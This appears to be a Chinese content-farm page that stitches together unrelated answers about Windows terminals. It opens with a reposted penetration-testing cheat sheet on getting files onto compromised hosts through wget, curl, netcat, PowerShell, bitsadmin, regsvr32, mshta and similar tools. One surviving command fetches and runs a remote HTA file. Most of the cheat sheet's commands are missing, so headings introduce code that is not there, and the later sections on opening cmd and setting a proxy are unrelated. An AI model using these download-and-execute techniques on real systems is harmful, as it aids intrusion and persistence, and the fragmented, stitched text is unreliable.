windows終端命令

Ⅰ 命令行/終端下載指令大全（win + linux）

在我們滲透測試的過程中，通常會需要向目標主機傳送一些文件，來達到提權，維持控制等目的。因此當不方便進行直接傳輸時，同時目標主機是能有網路連接的，那麼此時就可以通過本地下載這種方法來達到文件傳輸的目的。此篇文章，我會對互聯網上針對win與linux大部分的下載指令來做一個匯總，可能會有疏漏，但匯總的都是經常會用的。

這款工具功能很豐富，可以充當某種功能完備的GUI下載管理器，它擁有一款理想的下載管理器所需要的所有功能，比如它可以恢復下載，可以下載多個文件，出現某個連接問題後，可以重新嘗試下載，你甚至可以管理最大的下載帶寬。

直接下載：

後台下載:

如果互聯網連接出現中斷，恢復下載：

從某個密碼保護的ftp軟體庫下載文件：

Curl是另一種高效的下載工具，它可以用來上傳或下載文件，只要使用一個簡單的命令。它支持暫停和恢復下載程序包，並支持數量最多的Web協議，可預測下載完成還剩餘多少時間，可通過進度條來顯示下載進度。它是所有Linux發行版的內置工具。

直接下載：

藉助-o選項，提供名稱，下載文件會以該名稱保存；如使用-O選項，文件就會以原始名稱保存。

這是wget的出色替代者，是一款輕量級下載實用工具。它實際上是個加速器，因為它打開了多路http連接，可下載獨立文件片段，因而文件下載起來更快速。

直接下載：

這是一種開源命令行下載加速器，支持多個埠，你可以使用最大帶寬來下載文件，是一款易於安裝、易於使用的工具。

直接下載：

Perl是一門很吊的語言，使用它基本可以實現任何事情，用它實現文件下載也很簡單。

執行腳本文件是這樣:

Python也是很受歡迎的主流腳本語言，代碼清晰且簡潔:

Ruby是一個面對對象的語言，Metasploit框架就是用它來實現的，當然他也可以實現像下載文件這樣的小任務。

執行腳本文件是這樣；

PHP作為一種服務端腳本，也可以實現下載文件這種功能。

執行腳本文件是這樣:

一般情況下攻擊者使用FTP上傳文件需要很多交互的步驟，下面這個 bash 腳本，考慮到了交互的情況，可以直接執行並不會產生交互動作。

當然根據實際情況也可以進入交互終端：

攻擊者的電腦上輸入：

這個命令會將file的內容輸出到本地的1234埠中，然後不論誰連接此埠，file的內容將會發送到連接過來的IP。

目標電腦上的命令：

這條命令將連接攻擊者的電腦，接受file內容保存。

PowerShell 是一種winodws原生的腳本語言，對於熟練使用它的人來說，可以實現很多復雜的功能。

下面這兩條指令實現了從Internet網路下載一個文件。

可以應用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

文件下載並執行如下：

在1998年Visual Basic最終標准在windows上確定。下面的代碼可以實現下載文件，雖然它的長度比Powershell長多了。

在windows中Cscript指令可以允許你執行VBS腳本文件或者對script腳本做一些設置。在windows 7中這個指令並不是必須要用到。但是在windows XP中需要使用這條指令，如下所示:

在Windows Vista以及以後的版本中默認有FTP，可以使用以下命令運行：

上傳：

下載：

Bitsadmin是Windows命令行工具，用戶可以使用它來創建下載或上傳的任務。只能命令下載到指定路徑上，win7以上：

mshta http://192.168.3.1/run.htarun.hta 內容如下：

依賴於WScript.shell這個組件:

Regsvr32命令用於注冊COM組件，是 Windows 系統提供的用來向系統注冊控制項或者卸載控制項的命令，以命令行方式運行。

WinXP及以上系統的regsvr32.exe在windowssystem32文件夾下；2000系統的regsvr32.exe在winntsystem32文件夾下。

test.data內容：

還可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct文件：

Windows shares可以載入一個驅動器，然後用命令來復制文件。

載入遠程驅動：

當需要把一個exe文件放到目標計算機上時，Nishang可以使用PowerShell允許你把一個exe轉換成hex，然後把hex再轉換成原來的exe文件：

把exe轉成hex文件輸入：

打開evil.txt文件，復制內容，然後通過RDP的剪貼板復制進目標計算機，把hex文件還原成exe文件輸入：

1.MSXSL.EXE

msxsl.exe是微軟用於命令行下處理XSL的一個程序，所以通過他，我們可以執行JavaScript進而執行系統命令。

2.pubprn.vbs在Windows 7以上版本存在一個名為PubPrn.vbs的微軟已簽名WSH腳本，其位於

3.esentutl.exe/extrac32.exe

4.desktopimgdownldr.exedesktopimgdownldr.exe 位於 Win10 的 system32 文件夾中，原本用於設置鎖定屏幕或桌面背景圖像的。

普通用戶可以用：

這樣來下載文件。

可以把C:ProgramData來改成一個普通用戶可寫的目錄。

下載的文件存放於：

管理員用戶會多寫一個注冊表項，所以管理員最好的命令是：

https://xz.aliyun.com/t/1654

https://www.t00ls.net/articles-49501.html

https://evi1cg.me/archives/remote_exec.html

https://www.unixmen.com/top-10-command-line-tools-downloading-linux/

作者：肖洋肖恩、

原文鏈接：https://www.cnblogs.com/-mo-/p/12109717.html

Ⅱ windows11命令有多少條

windows11命令有676條。
首先在windows11桌面下方任務欄中右鍵windows圖標。接著在右鍵菜單中選擇windows終端管理員。打開之後，在窗口中點擊小箭頭。然後在下拉菜單中選擇命令提示符。這樣就可以打開命令提示符了，然後在其中輸入內容即可。
很多時候我們需要打開命令提示符，來進行對系統服務，關開機，獲取信息的操作，那麼Win11系統的命令提示符怎麼打開，我們可以通過兩種方法來打開命令提示符，一種通過任務欄，另一種通過搜索來實現。

Ⅲ Windows在終端打開當前目錄的命令

Windows在終端打開當前目錄的命令

1)、通過start命令

2)、通過explorer命令

3 linux終端打開當前目錄命令如下

4 mac終端打開當前目錄命令如下

Ⅳ 在電腦終端中輸入命令，是在哪裡輸入啊，怎麼打開

1、在Windows10系統，右鍵點擊開始按鈕，在彈出的菜單中看到當前是Windows PowerShell菜單項，而不是命令提示符菜單項。

Ⅳ 設置Windows系統的cmd命令行終端的代理

首先，你要啟動代理伺服器，比如我的 v2ray ：

我這里是 10808 埠。

如果只是暫時使用代理，你可以在windows的cmd命令行中，執行下面命令：

如果你要取消設置：

臨時生效方案中，當你關閉cmd，再次打開時，之前的設置將會失效，代理依然使用不了。

為了每次打開cmd，cmd都使用代理，那麼，可以通過設置系統環境變數的方式，進行設置。右鍵 我的電腦 -> 屬性 -> 高級系統設置 -> 高級 -> 環境變數 ，然後在 系統環境 中，新建兩個系統環境變數，變數名稱分別為 https_proxy 和 http_proxy ，值為 https_proxy=socks5://127.0.0.1:10808 ：

然後重啟cmd命令行，使用 curl www.google.com ，如果有內容返回，說明設置成功（不可以是 ping 命令進行測試）。

Ⅵ Windows怎麼打開電腦終端

1、按【windows鍵】+【X】鍵，然後會彈出如下提示框，選擇命令提示符即可打開。

注意事項：

Windows採用了圖形化模式GUI，比起從前的Dos需要輸入指令使用的方式，更為人性化。隨著計算機硬體和軟體的不斷升級，微軟的 Windows也在不斷升級。